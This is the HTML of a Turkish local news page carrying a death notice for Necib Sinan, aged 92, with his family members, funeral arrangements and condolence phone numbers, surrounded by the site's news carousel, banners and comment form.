class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YaYam_Hastanesi_980.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/asik-mahzuni-ses-yarismasinda-final-gecesi-h68413.html" title="Aşık Mahzuni Ses Yarışması’nda Final Gecesi" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/11/Ysimsiz-2_2.jpg" alt="Aşık Mahzuni Ses Yarışması’nda Final Gecesi" class="pull-left" /> <div class="caption-line"><p>Aşık Mahzuni Ses Yarışması’nda Final...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-bizim-evimiz-slogani-ile-ziyaretlerini-surduruyor-h68412.html" title="Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini sürdürüyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/11/Ysimsiz-2_1.jpg" alt="Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini sürdürüyor" class="pull-left" /> <div class="caption-line"><p>Başkan Gürbüz, ‘Elbistan bizim evimiz’...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-kale-restoran-aciklamasi-h68404.html" title="Elbistan Belediyesi’nden Kale Restoran açıklaması" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/11/kale_restoran_acYklamasY_1.jpg" alt="Elbistan Belediyesi’nden Kale Restoran açıklaması" class="pull-left" /> <div class="caption-line"><p>Elbistan Belediyesi’nden Kale Restoran açıklaması</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-teknik-takipli-tefecilik-sorusturmasi-29-kisiye-islem-yapildi-h68401.html" title="Elbistan’da teknik takipli tefecilik soruşturması: 29 kişiye işlem yapıldı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/11/dc02cb39-d9db-428f-b3aa-4b4a23e0375b.jpg" alt="Elbistan’da teknik takipli tefecilik soruşturması: 29 kişiye işlem yapıldı" class="pull-left" /> <div class="caption-line"><p>Elbistan’da teknik takipli tefecilik soruşturması:...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/sokaga-cikma-yasagi-ve-diger-tedbirlerin-detaylari-belli-oldu-h68395.html" title="Sokağa çıkma yasağı ve diğer tedbirlerin detayları belli oldu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/11/sokakcYkmak.jpg" alt="Sokağa çıkma yasağı ve diğer tedbirlerin detayları belli oldu" class="pull-left" /> <div class="caption-line"><p>Sokağa çıkma yasağı ve diğer...</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Necib Sinan 92 yaşında</h1> <h2 class="lead" itemprop="description"><strong></strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2020-11-19 15:42:00" content="2020-11-19T15:42:00+02:00">19 Kasım 2020 Perşembe 15:42</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/necib_sinan_92_yasinda_h68407_e118e.jpg" alt="Necib Sinan 92 yaşında" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/vefatlar/necib-sinan-92-yasinda-h68407.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><a href="http://www.elbistaninsesi.com/banner.php?id=17" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/gocbal1_2.gif" width="336" height="280" style="width:336px;height: 280px;border:0" alt="banner17" /></a></div> <div class="reklam reklam135 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=43" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/diyarbakYr_burma_kadayYf_1.gif" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner43" /></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Köprübaşı Mahallesi’nden İstiklal Savaşı gazisi merhum Hüseyin Avni Sinan ve merhume Süreyya Candansayar ailesinin oğlu, merhume Pakize Sinan’ın eşi, Nurettin, Nihal, Sait, Abdulkadir, Jale ve Kurtuluş Sinan kardeşlerin babası, Gülay Hurmanlı, Mehmet Mustafa ve Kadir Sinan, Beşire Şen, Bedriye Yıldız ve Neslihan Cehiz’in ağabeyleri, Celal Çıkın ve Mustafa Çimen’in kayınbabası, belediyeden emekli Mehmet Sinan’ın amcasının oğlu, Av. Özgür Çıkın’ın dedesi, 15 torun dedesi Necib Sinan vefat etmiştir. Cenazesi, 20 Kasım Cuma günü ikindi namazına müteakip Ulu Cami’inden alınarak Gariplik Mezarlığı’na defnedilecektir.</span></span><span style="font-family: Arial, sans-serif; font-size: 16px;"> </span><br/> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Taziye için telefon:</span></span><br/> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">0505 629 6317 oğlu Nurettin<br/> </span></span><span style="font-family: Arial, sans-serif; font-size: 16px;">0553 463 3647 oğlu Sait</span><br/> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">0539 417 0122 kardeşi Mustafa<br/> </span></span><span style="font-family: Arial, sans-serif; font-size: 16px;">0536 988 11 69 amcaoğlu Mehmet</span><br/> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">0505 767 9870 damadı Celal.</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kabaagac-ta-kaza-1-i-cocuk-3-yarali-h68415.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/asik-mahzuni-ses-yarismasinda-final-gecesi-h68413.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-bizim-evimiz-slogani-ile-ziyaretlerini-surduruyor-h68412.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/isci-servislerine-koronavirus-denetimi-h68411.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ismail-genc-esnaf-kefalet-kooperatifine-baskan-adayligini-acikladi-h68410.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/3u-aranan-sahis-olmak-uzere-4-kisi-yakalandi-h68409.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-kale-restoran-aciklamasi-h68404.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/katil-zanlisi-agabey-arazide-saklanirken-yakalandi-h68402.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-teknik-takipli-tefecilik-sorusturmasi-29-kisiye-islem-yapildi-h68401.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sokaga-cikma-yasagi-ve-diger-tedbirlerin-detaylari-belli-oldu-h68395.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/25-milyonda-1-gorulen-hastalik-kucuk-yunus-emreyi-hayattan-kopardi-h68397.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/toplu-ulasimda-hes-kodu-eslestirmesi-icin-son-tarih-15-aralik-h68399.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tarim-krediden-ureticilere-tarim-sigortasi-cagrisi-h68398.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hospitacar-oto-ekspertiz-elbistan-acildi-h68396.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-yeni-koronavirus-tedbirlerini-acikladi-h68391.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kardes-kavgasinda-kan-akti-1-olu-h68390.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/yasak-var-uyan-yok-h68388.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/osb-mutesebbis-heyet-toplantisi-yapildi-h68387.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/meteorolojiden-kar-uyarisi-h68386.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gelir-idaresi-baskanligindan-borc-yapilandirmasinin-esaslarini-acikladi-h68389.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/turkiyeye-kopru-vakfindan-elbistanli-ogrencilere-hediye-h68385.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobilden-mermi-yagdirdilar-3-yarali-h68381.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/pozitif-vaka-ya-da-temasli-ozel-sektor-calisanlari-da-izinli-sayilacak-h68379.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/nurhak-daginin-on-yuzunden-ilk-tirmanis-gerceklestirildi-h68378.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/danilo-seften-elbistan-lahanasi-paylasimi-h68377.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/kabaagac-ta-kaza-1-i-cocuk-3-yarali-h68415.html" title="Kabaağaç&#039;ta kaza: 1&#039;i çocuk 3 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/kabagac_ta_kaza_1_i_cocuk_3_yarali_h68415_e01f0.jpg" alt="Kabaağaç&#039;ta kaza: 1&#039;i çocuk 3 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kabaağaç&#039;ta kaza: 1&#039;i çocuk 3 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/asik-mahzuni-ses-yarismasinda-final-gecesi-h68413.html" title="Aşık Mahzuni Ses Yarışması’nda Final Gecesi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/asik_mahzuni_ses_yarismasinda_final_gecesi_h68413_61af6.jpg" alt="Aşık Mahzuni Ses Yarışması’nda Final Gecesi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Aşık Mahzuni Ses Yarışması’nda Final Gecesi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-bizim-evimiz-slogani-ile-ziyaretlerini-surduruyor-h68412.html" title="Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini sürdürüyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/baskan_gurbuz_elbistan_bizim_evimiz_slogani_ile_ziyaretlerini_surduruyor_h68412_84287.jpg" alt="Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini sürdürüyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Gürbüz, ‘Elbistan bizim evimiz’ sloganı ile ziyaretlerini sürdürüyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/isci-servislerine-koronavirus-denetimi-h68411.html" title="İşçi servislerine koronavirüs denetimi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/isci_servislerine_koronavirus_denetimi_h68411_410b6.jpg" alt="İşçi servislerine koronavirüs denetimi" /> <div class="carousel-caption"> <h2> <span style="font-size:">İşçi servislerine koronavirüs denetimi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ismail-genc-esnaf-kefalet-kooperatifine-baskan-adayligini-acikladi-h68410.html" title="İsmail Genç, Esnaf Kefalet Kooperatifi’ne başkan adaylığını açıkladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/ismail_genc_esnaf_kefalet_kooperatifine_baskan_adayligini_acikladi_h68410_16cd8.jpg" alt="İsmail Genç, Esnaf Kefalet Kooperatifi’ne başkan adaylığını açıkladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">İsmail Genç, Esnaf Kefalet Kooperatifi’ne başkan adaylığını açıkladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/3u-aranan-sahis-olmak-uzere-4-kisi-yakalandi-h68409.html" title="3’ü aranan şahıs olmak üzere 4 kişi yakalandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/3u_aranan_sahis_olmak_uzere_4_kisi_yakalandi_h68409_e1528.jpg" alt="3’ü aranan şahıs olmak üzere 4 kişi yakalandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">3’ü aranan şahıs olmak üzere 4 kişi yakalandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-kale-restoran-aciklamasi-h68404.html" title="Elbistan Belediyesi’nden Kale Restoran açıklaması"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/elbistan_belediyesinden_kale_restoran_aciklamasi_h68404_a6565.jpg" alt="Elbistan Belediyesi’nden Kale Restoran açıklaması" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi’nden Kale Restoran açıklaması</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/katil-zanlisi-agabey-arazide-saklanirken-yakalandi-h68402.html" title="Katil zanlısı ağabey, arazide saklanırken yakalandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/katil_zanlisi_agabey_arazide_saklanirken_yakalandi_h68402_dfbc6.jpg" alt="Katil zanlısı ağabey, arazide saklanırken yakalandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Katil zanlısı ağabey, arazide saklanırken yakalandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-teknik-takipli-tefecilik-sorusturmasi-29-kisiye-islem-yapildi-h68401.html" title="Elbistan’da teknik takipli tefecilik soruşturması: 29 kişiye işlem yapıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/elbistanda_teknik_takipli_tefecilik_sorusturmasi_29_kisiye_islem_yapildi_h68401_56ea4.jpg" alt="Elbistan’da teknik takipli tefecilik soruşturması: 29 kişiye işlem yapıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’da teknik takipli tefecilik soruşturması: 29 kişiye işlem yapıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sokaga-cikma-yasagi-ve-diger-tedbirlerin-detaylari-belli-oldu-h68395.html" title="Sokağa çıkma yasağı ve diğer tedbirlerin detayları belli oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/sokaga_cikma_yasagi_ve_diger_tedbirlerin_detaylari_belli_oldu_h68395_3ee40.jpg" alt="Sokağa çıkma yasağı ve diğer tedbirlerin detayları belli oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Sokağa çıkma yasağı ve diğer tedbirlerin detayları belli oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/25-milyonda-1-gorulen-hastalik-kucuk-yunus-emreyi-hayattan-kopardi-h68397.html" title="25 milyonda 1 görülen hastalık, küçük Yunus Emre’yi hayattan kopardı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/25_milyonda_1_gorulen_hastalik_kucuk_yunus_emreyi_hayattan_kopardi_h68397_eb428.jpg" alt="25 milyonda 1 görülen hastalık, küçük Yunus Emre’yi hayattan kopardı" /> <div class="carousel-caption"> <h2> <span style="font-size:">25 milyonda 1 görülen hastalık, küçük Yunus Emre’yi hayattan kopardı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/toplu-ulasimda-hes-kodu-eslestirmesi-icin-son-tarih-15-aralik-h68399.html" title="Toplu ulaşımda HES kodu eşleştirmesi için son tarih 15 Aralık"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/toplu_ulasimda_hes_kodu_eslestirmesi_icin_son_tarih_15_aralik_h68399_a004b.jpg" alt="Toplu ulaşımda HES kodu eşleştirmesi için son tarih 15 Aralık" /> <div class="carousel-caption"> <h2> <span style="font-size:">Toplu ulaşımda HES kodu eşleştirmesi için son tarih 15 Aralık</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tarim-krediden-ureticilere-tarim-sigortasi-cagrisi-h68398.html" title="Tarım Kredi’den üreticilere tarım sigortası çağrısı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/tarim_krediden_ureticilere_tarim_sigortasi_cagrisi_h68398_2d1ae.jpg" alt="Tarım Kredi’den üreticilere tarım sigortası çağrısı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Tarım Kredi’den üreticilere tarım sigortası çağrısı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hospitacar-oto-ekspertiz-elbistan-acildi-h68396.html" title="Hospitacar Oto Ekspertiz Elbistan açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/hospitacar_oto_ekspertiz_elbistan_acildi_h68396_9d70c.jpg" alt="Hospitacar Oto Ekspertiz Elbistan açıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hospitacar Oto Ekspertiz Elbistan açıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-yeni-koronavirus-tedbirlerini-acikladi-h68391.html" title="Cumhurbaşkanı Erdoğan, yeni koronavirüs tedbirlerini açıkladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/cumhurbaskani_erdogan_yeni_koronavirus_tedbirlerini_acikladi_h68391_f346b.jpg" alt="Cumhurbaşkanı Erdoğan, yeni koronavirüs tedbirlerini açıkladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Cumhurbaşkanı Erdoğan, yeni koronavirüs tedbirlerini açıkladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kardes-kavgasinda-kan-akti-1-olu-h68390.html" title="Kardeş kavgasında kan aktı: 1 ölü"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/kardes_kavgasinda_kan_akti_1_olu_h68390_20687.jpg" alt="Kardeş kavgasında kan aktı: 1 ölü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kardeş kavgasında kan aktı: 1 ölü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/yasak-var-uyan-yok-h68388.html" title="YASAK VAR! UYAN YOK!"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/yasak_var_uyan_yok_h68388_f2b6f.jpg" alt="YASAK VAR! UYAN YOK!" /> <div class="carousel-caption"> <h2> <span style="font-size:">YASAK VAR! UYAN YOK!</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/osb-mutesebbis-heyet-toplantisi-yapildi-h68387.html" title="OSB müteşebbis heyet toplantısı yapıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/osb_mutesebbis_heyet_toplantisi_yapildi_h68387_ecbaf.jpg" alt="OSB müteşebbis heyet toplantısı yapıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">OSB müteşebbis heyet toplantısı yapıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/meteorolojiden-kar-uyarisi-h68386.html" title="Meteorolojiden kar uyarısı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/meteorolojiden_kar_uyarisi_h68386_e33c5.jpg" alt="Meteorolojiden kar uyarısı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Meteorolojiden kar uyarısı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gelir-idaresi-baskanligindan-borc-yapilandirmasinin-esaslarini-acikladi-h68389.html" title="Gelir İdaresi Başkanlığı’ndan borç yapılandırmasının esaslarını açıkladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/gelir_idaresi_baskanligindan_borc_yapilandirmasinin_esaslarini_acikladi_h68389_a7c5f.jpg" alt="Gelir İdaresi Başkanlığı’ndan borç yapılandırmasının esaslarını açıkladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gelir İdaresi Başkanlığı’ndan borç yapılandırmasının esaslarını açıkladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/turkiyeye-kopru-vakfindan-elbistanli-ogrencilere-hediye-h68385.html" title="Türkiye’ye Köprü Vakfı’ndan Elbistanlı öğrencilere hediye"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/turkiyeye_kopru_vakfindan_elbistanli_ogrencilere_hediye_h68385_ec2c0.jpg" alt="Türkiye’ye Köprü Vakfı’ndan Elbistanlı öğrencilere hediye" /> <div class="carousel-caption"> <h2> <span style="font-size:">Türkiye’ye Köprü Vakfı’ndan Elbistanlı öğrencilere hediye</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobilden-mermi-yagdirdilar-3-yarali-h68381.html" title="Otomobilden mermi yağdırdılar: 3 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/otomobilden_mermi_yagdirdilar_3_yarali_h68381_5ae63.jpg" alt="Otomobilden mermi yağdırdılar: 3 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobilden mermi yağdırdılar: 3 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/pozitif-vaka-ya-da-temasli-ozel-sektor-calisanlari-da-izinli-sayilacak-h68379.html" title="Pozitif vaka ya da temaslı özel sektör çalışanları da izinli sayılacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/pozitif_vaka_ya_da_temasli_ozel_sektor_calisanlari_da_izinli_sayilacak_h68379_d368a.jpg" alt="Pozitif vaka ya da temaslı özel sektör çalışanları da izinli sayılacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Pozitif vaka ya da temaslı özel sektör çalışanları da izinli sayılacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/nurhak-daginin-on-yuzunden-ilk-tirmanis-gerceklestirildi-h68378.html" title="Nurhak Dağı’nın ön yüzünden ilk tırmanış gerçekleştirildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/nurhak_daginin_on_yuzunden_ilk_tirmanis_gerceklestirildi_h68378_9e52d.jpg" alt="Nurhak Dağı’nın ön yüzünden ilk tırmanış gerçekleştirildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Nurhak Dağı’nın ön yüzünden ilk tırmanış gerçekleştirildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/danilo-seften-elbistan-lahanasi-paylasimi-h68377.html" title="Danilo Şef’ten ‘Elbistan Lahanası’ paylaşımı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/11/danilo_seften_elbistan_lahanasi_paylasimi_h68377_d0bdb.jpg" alt="Danilo Şef’ten ‘Elbistan Lahanası’ paylaşımı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Danilo Şef’ten ‘Elbistan Lahanası’ paylaşımı</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/Necib+Sinan+92+ya%C5%9F%C4%B1nda" title="Necib Sinan 92 Yaşında haberleri">Necib Sinan 92 Yaşında</a></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/vefatlar/necib-sinan-92-yasinda-h68407.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" 